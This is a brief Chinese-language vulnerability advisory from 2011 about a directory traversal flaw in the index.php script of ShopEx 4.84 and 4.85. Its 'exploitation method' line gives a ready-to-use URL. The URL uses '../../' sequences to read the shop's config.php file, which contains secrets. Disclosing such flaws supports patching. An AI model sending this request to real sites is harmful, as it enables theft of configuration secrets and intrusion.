ShopEx index.php脚本目录遍历漏洞

发布日期：2011-03.31
发布作者：佚名

影响版本：ShopEx4.85 & 4.84
官方网站：http://www.shopex.cn

漏洞类型：文件包含

漏洞描述：ShopEx的index.php脚本没有正确地过滤用户所提交的请求，远程攻击者可以通过在请求参数中包含目录遍历序列读取指定位置的

文件。

利用办法：http://site/shopadmin/index.php?ctl=sfile&;act=getDB&p[0]=../../config/config.php

标签分类：